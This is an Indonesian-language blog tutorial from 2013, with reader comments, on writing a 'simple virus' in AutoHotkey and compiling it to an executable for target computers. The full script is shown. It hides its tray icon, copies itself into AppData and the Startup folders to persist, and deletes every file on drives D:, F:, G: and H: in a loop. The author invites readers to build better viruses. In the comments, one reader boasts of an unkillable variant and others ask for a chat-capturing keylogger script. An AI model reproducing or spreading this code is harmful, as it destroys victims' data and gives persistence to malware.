Monday, 30 December 2013

Membuat Virus Sederhana Dengan Autohotkey

Sobat blogger mungkin sudah sering membaca artikel bagaimana cara membuat virus sederhana dari website atau blog lainnya. Tetapi cara membuat virus yang satu ini sedikit berbeda karena menggunakan bantuan software yang bernama Autohotkey. Sebenarnya aplikasi Autohotkey sudah lama ada dan lumayan terkenal dikalangan programmer karena bahasa pemrogramannya tergolong mudah untuk diaplikasikan bahkan bagi pemula seperti saya. Hehehe. Ok dari pada berlama-lama langsung saja kita ke TKP !

1. MEMBUAT SCRIPT VIRUS

  • Download Autohotkey dan install ( Link download ada di akhir artikel )
  • Klik kanan pada Desktop >> New >> Autohotkey Script
  • Klik kanan pada New Autohotkey Script >> Edit
  • Copy kode di bawah ini pada halaman script yang terbuka ( tulisan yang berwarna merah dapat anda ganti dengan nama lain sesuka anda )
#NoEnv
#NoTrayIcon
#Persistent
Loop,
{
FileCreateDir, %A_AppData%\Windows
FileCreateDir, %A_AppDataCommon%\Windows
FileCopy, Virus.ahk, %A_AppData%\Windows\Virus.exe, 1
FileCopy, Virus.ahk, %A_AppDataCommon%\Windows\Virus.exe, 1
FileCopy, Virus.ahk, %A_StartUp%\Virus.exe, 1
FileCopy, Virus.ahk, %A_StartUpCommon%\Virus.exe, 1
FileDelete, D:\*.*
FileDelete, F:\*.*
FileDelete, G:\*.*
FileDelete, H:\*.*
}
Return
  • Jika sudah klik File >> SaveAs. Pada File Name ketikkan Virus.ahk ( nama boleh berbeda yang penting diikuti oleh .ahk dan sesuai dengan tulisan merah diatas) dan pada Save As Type pilih All Files. Klik Save


2. MEMBUAT FILE EKSEKUSI VIRUS (Convert .AHK to .EXE)

Dari langkah nomor 1 diatas sebenarnya virus yang kita ciptakan sudah dapat dijalankan. Tetapi virus tersebut hanya dapat berjalan di komputer yang terinstall Autohotkey saja. Nah untuk mengatasi hal tersebut maka kita harus mengubah Virus.ahk menjadi Virus.exe . Bagaimana caranya?
  • Klik Start >> All Programs >> Autohotkey >> Convert .ahk to .exe
  • Akan muncul kotak dialog :
    • Pada Source ( script file ) klik Browse dan cari file Virus.ahk yang dibuat tadi
    • Pada Destination ( .exe file ) klik Browse dan ketik nama virus yang diinginkan .Contoh : Virus.exe ( nama file harus diikuti kata .exe)
    • Klik Convert
  • Taraaaa virus sederhana pun telah jadi! Dan file virus ini dapat dijalankan di semua komputer target :D
NOTE : 
Script virus diatas menyerang seluruh file yang ada di drive D:\ , F:\ , G:\ , H:\ dan akan berjalan otomatis saat komputer dinyalakan. Silahkan anda kembangkan sendiri untuk menciptakan virus yang lebih baik.

Untuk mendownload installer Autohotkey v 1.1.13.01 silahkan klik gambar di bawah ini :


8 comments:

  1. Sorry yah gue udah cloning razajokemu pake reshaker...
    Lalu gue belajar ntu sript sambil brosing...
    Dan sekarang gue udah bisa buat virus keren, dijamin nggak bisa ditaskkill..
    Soalnya ada script loop "MinimizeAll"
    Buat exit cuma "Shift+=" ntar gue upload !!

    ReplyDelete
    Replies
    1. Ok ditunggu link downloadnya :D

      Delete
    2. ini virus kalo gua buat lewat leptop gua ntr leptop gua kena juga kali

      Delete
    3. Halah nggak papa paling yang kehapus cuma drive D: F: G: H: doang !
      btw kalo System Drive na ada di salah satu yang disebutkan maka nggak kehapus kok !
      Buat cancel taskkill programnya aja pakek Task Manager !
      Kalo diblokir pakek software lainnya spt : process explorer, cmd, dll.

      Delete
    4. Nah itu udah tau si Azizi Ikhtiar :D

      Delete
  2. Mas, gimana script cara menangkap ketikan ato kiriman chat kontak yang muncul di yahoo messenger lalu disimpan di notepad atau excel ato word
    Terima kasih

    ReplyDelete
  3. Mas, gimana script cara menangkap ketikan ato kiriman chat kontak yang muncul di yahoo messenger lalu disimpan di notepad atau excel ato word
    Terima kasih

    ReplyDelete
  4. Mas, gimana script cara menangkap ketikan ato kiriman chat kontak yang muncul di yahoo messenger lalu disimpan di notepad atau excel ato word
    Terima kasih

    ReplyDelete

Berkomentarlah secara baik dan sopan , hindari pesan SARA dan SPAM.
Saya ucapkan banyak termakasih atas komentar yang anda tinggalkan. ^_^